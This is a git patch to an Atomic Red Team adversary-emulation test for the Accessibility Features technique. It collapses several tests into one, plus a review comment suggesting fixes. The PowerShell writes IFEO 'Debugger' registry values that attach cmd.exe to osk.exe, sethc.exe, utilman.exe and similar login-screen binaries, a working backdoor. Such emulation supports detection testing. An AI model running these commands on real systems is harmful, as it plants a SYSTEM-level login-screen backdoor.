From 06361de3375eb2d5197b627ddfc5de07703ad441 Mon Sep 17 00:00:00 2001
From: Andras32
Date: Tue, 28 Jan 2020 15:09:24 -0600
Subject: [PATCH] T1015 collapsed technique into one atomic with additional inputargs (#808)

* collapsed technique into one atomic
* Update atomics/T1015/T1015.yaml
Co-Authored-By: Keith McCammon
* Update atomics/T1015/T1015.yaml
Co-Authored-By: Keith McCammon
* Update atomics/T1015/T1015.yaml
Co-Authored-By: Keith McCammon
* T1015 removed reference to execution framework
* Update description T1015.yaml
Co-Authored-By: Keith McCammon
* Update dash over colon T1015.yaml
Co-Authored-By: Keith McCammon
Co-authored-by: Keith McCammon
---
 atomics/T1015/T1015.yaml | 234 +++++----------------------------------
 1 file changed, 28 insertions(+), 206 deletions(-)

diff --git a/atomics/T1015/T1015.yaml b/atomics/T1015/T1015.yaml
index 24754b05..98198fc1 100644
--- a/atomics/T1015/T1015.yaml
+++ b/atomics/T1015/T1015.yaml
@@ -3,222 +3,44 @@ attack_technique: T1015
 display_name: Accessibility Features
 atomic_tests:
-- name: Attaches Command Prompt As Debugger To Process - osk
+- name: Attaches Command Prompt as a Debugger to a List of Target Processes
 description: |
 This allows adversaries to execute the attached process
+ Attaches cmd.exe to osk.exe by default. Other useful values to include in parent_list include: "sethc.exe", "utilman.exe", "magnify.exe", "narrator.exe", "DisplaySwitch.exe", "atbroker.exe".
 supported_platforms:
 - windows
 input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
+ parent_list:
+ description: Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe"
 type: String
- default: osk.exe
+ default: "osk.exe"
+ attached_process:
+ description: Full path to process to attach to target in #{parent_list}. Default: cmd.exe
+ type: Path
+ default: C:\windows\system32\cmd.exe
 executor:
 name: powershell
 elevation_required: true
 command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
+ $input_table = #{parent_list}
+ Foreach ($item in $input_table){
+ $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item"
+ $Value = "#{attached_process}"
+ $Name = "Debugger"
+ IF(!(Test-Path $registryPath))
+ {
+ New-Item -Path $registryPath -Force
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
+ }
+ ELSE
+ {
+ New-ItemProperty -Path $registryPath -Name $name -Value $Value
+ }
+ }
 cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\osk.exe" /v Debugger /f
-
-
-- name: Attaches Command Prompt As Debugger To Process - sethc
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: sethc.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /v Debugger /f
-
-- name: Attaches Command Prompt As Debugger To Process - utilman
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: utilman.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /v Debugger /f
-
-- name: Attaches Command Prompt As Debugger To Process - magnify
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: magnify.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe" /v Debugger /f
-
-- name: Attaches Command Prompt As Debugger To Process - narrator
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: narrator.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\narrator.exe" /v Debugger /f
-
-
-- name: Attaches Command Prompt As Debugger To Process - DisplaySwitch
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: DisplaySwitch.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DisplaySwitch.exe" /v Debugger /f
-
-
-- name: Attaches Command Prompt As Debugger To Process - AtBroker
- description: |
- This allows adversaries to execute the attached process
-
- supported_platforms:
- - windows
- input_arguments:
- target_executable:
- description: File You Want To Attach cmd To
- type: String
- default: atbroker.exe
-
- executor:
- name: powershell
- elevation_required: true
- command: |
- $registryPath = "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe"
- $Value = "C:\windows\system32\cmd.exe"
- $Name = "Debugger"
- IF(!(Test-Path $registryPath))
- {
- New-Item -Path $registryPath -Force | Out-Null
- New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force
- }
- ELSE
- {
- New-ItemProperty -Path $registryPath -Name $name -Value $Value
- }
- cleanup_command: |
- reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\atbroker.exe" /v Debugger /f
+ $input_table = #{parent_list}
+ Foreach ($item in $input_table){
+ reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\$item" /v Debugger /f
+ }
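Review bot: `$input_table = #{parent_list}` splices the argument in as raw PowerShell, so the documented "comma separated list" form (`"sethc.exe,utilman.exe"`) is a single string and the loop writes one IFEO subkey literally named `sethc.exe,utilman.exe` rather than one per binary; the default `"osk.exe"` only works because a lone string enumerates once. Replacing the first line of both the command and the cleanup_command loop with `$input_table = @(#{parent_list}) -split ',' | ForEach-Object { $_.Trim() }` accepts both the quoted comma-separated form and a PowerShell array literal, and keeps cleanup symmetric with what was created. The ELSE branch still calls `New-ItemProperty` without `-Force`, which errors instead of overwriting when a Debugger value already exists under a pre-existing IFEO key (the exact state this test leaves behind if cleanup is skipped); `Set-ItemProperty -Path $registryPath -Name $Name -Value $Value` would make the rerun idempotent. Cleanup removes only the Debugger value and leaves the IFEO subkey that `New-Item` created, which is worth stating in the description since detections keyed on IFEO subkey creation will see residue after the test, and a per-item `Remove-Item` is only safe for subkeys the test itself created.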